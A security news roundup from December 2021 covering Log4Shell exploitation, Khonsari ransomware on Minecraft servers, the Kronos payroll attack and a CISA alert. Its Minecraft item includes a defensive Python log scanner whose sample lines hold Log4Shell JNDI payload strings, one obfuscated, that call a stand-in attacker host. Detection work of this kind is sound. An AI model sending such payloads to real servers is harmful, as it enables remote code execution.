AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response


InfoSec News Nuggets 12/17/2021

This image looks very different on Apple devices — see for yourself

Take a good look at the image below and the device you are on. Now view it again on an Apple device. Conversely, if you are using an Apple device, view this page on an Android or Windows device. If you are using an Apple device and viewing this page in Safari, chances are the image appears quite different from what you’d see in, for example, Chrome or an imaging app on Windows. Reverse engineer and cryptographer David Buchanan might have left us all puzzled with his latest creation. The PNG reads ‘HELLO WORLD’ for most users, except in Apple-made software, where it reads ‘HELLO APPLE.’ But, believe us, it is the same image, a.png, interpreted differently by Apple and non-Apple applications.


CISA: Prepare Now for Holiday Cyber Onslaught

Critical infrastructure (CNI) providers must act now to protect their IT systems from attacks during the holiday season, the US government has warned. The Cybersecurity and Infrastructure Security Agency (CISA) issued a new alert demanding a more proactive stance “in light of persistent and ongoing cyber-threats.” It urged organizations to ensure they have sufficient staff to continuously monitor IT and OT systems over the holidays and that they stay informed of the latest threats by signing up to CISA mailing lists and feeds. The agency also urged network defenders to follow industry best practices such as enforcing multi-factor authentication and strong passwords and installing software updates. CNI firms should also test their incident response processes and cross-sector dependencies and report any incidents and “anomalous activity” immediately to CISA, it said.


Microsoft: Khonsari ransomware hits self-hosted Minecraft servers

Microsoft urges admins of self-hosted Minecraft servers to upgrade to the latest release to defend against Khonsari ransomware attacks exploiting the critical Log4Shell security vulnerability. Mojang Studios, the Swedish video game developer behind Minecraft, released an emergency security update last week to address the bug tracked as CVE-2021-44228 in the Apache Log4j Java logging library (used by the game’s Java Edition client and multiplayer servers). While there was no mention of attacks targeting Minecraft servers using Log4Shell exploits at the time, Redmond’s security experts updated their CVE-2021-44228 guidance today to warn of ongoing exploitation to deliver ransomware on non-Microsoft-hosted Minecraft servers. “In these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients,” Microsoft said.
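Because the delivery vector described above is an in-game chat message that ends up in the server log, operators can triage their own logs for it. The following is an added example (not code from Microsoft, Mojang or the article): a small Python check over Minecraft server log lines that flags messages carrying the Log4j JNDI lookup pattern, including the nested case/default lookups Log4j evaluates that hide the literal "jndi" string. The sample log lines and the host attacker.example are constructed.

```python
import re

# Constructed sample Minecraft server log lines (not real captures): a benign
# chat message, a plain JNDI lookup, and one using nested Log4j lookups so the
# string "jndi" never appears literally in the raw line.
SAMPLE_LOG = [
    "[10:01:02] [Server thread/INFO]: <alice> gg everyone",
    "[10:01:09] [Server thread/INFO]: <bob> ${jndi:ldap://attacker.example/a}",
    "[10:01:15] [Server thread/INFO]: <eve> ${${lower:j}ndi:${lower:l}dap://attacker.example/b}",
]

# Log4j 2.x lookups that resolve to plain text and are used to obfuscate "jndi":
#   ${lower:X} / ${upper:X}  -> X (case is irrelevant to the match below)
#   ${anything:-X}           -> X (default-value syntax, e.g. ${::-j} or ${env:NOPE:-j})
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(message: str) -> str:
    """Resolve nested case/default lookups innermost-first until nothing changes.

    Each substitution strictly shortens the string, so the loop terminates.
    """
    prev = None
    while prev != message:
        prev = message
        message = _CASE_LOOKUP.sub(lambda m: m.group(1), message)
        message = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), message)
    return message


def is_log4shell_probe(line: str) -> bool:
    """True if the (de-obfuscated) line contains a JNDI lookup."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line index, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        resolved = normalize(line)
        if _JNDI.search(resolved):
            hits.append((i, resolved))
    return hits


if __name__ == "__main__":
    for idx, resolved in scan(SAMPLE_LOG):
        print(f"line {idx}: {resolved}")
```

Normalizing before matching matters: a detector that greps the raw line for `${jndi:` misses the third sample line entirely.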


Ransomware attack threatens paychecks just before Christmas

A major payroll company has been crippled by ransomware hackers, leaving some companies around the country scrambling to cover employees’ last paychecks before Christmas and many workers wondering if they’ll get paid on time. Kronos, one of the largest workforce management companies in the U.S., was hit with ransomware Saturday, according to the company’s public updates page, and announced Monday that its programs that rely on cloud services — which a number of companies use to pay employees and manage their hours — would be unavailable for “several weeks.” For many Americans who are paid biweekly, Dec. 17 is the final payday before Christmas.


‘Insane’ spread of Log4j exploits won’t abate anytime soon

The high-profile Log4j security vulnerability known as Log4Shell is attracting attacks at a rate that is astounding even veteran infosec professionals. Nadir Izrael, chief technology officer for IoT security firm Armis, said that just a few days after its initial disclosure, the bug, designated as CVE-2021-44228, is being subjected to an alarmingly high level of exploit activity. “Compared to others, this is kind of insane,” Izrael told SearchSecurity. “The speed with which it started getting exploited, and the volume and magnitude, is insane.” Izrael estimated that more than a third of Armis’ security clients have had internet-facing systems targeted by exploit scripts that seek to use the remote code execution flaw to place malware. Other security vendors and researchers have noted similar patterns, with attackers looking to run anything from cryptomining scripts to remote access and command payloads.


Seeking Victims of Log4j Vulnerability

The FBI and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) are working jointly in response to the ongoing threat associated with the Log4j CVE. If you believe that malicious cyber actors have exploited this vulnerability on your network, please submit a complaint to the Internet Crime Complaint Center (IC3). Your responses are voluntary but would be useful in identifying you as a potential victim. Based on the responses provided, you may be contacted by the FBI and/or CISA and asked to provide additional information.
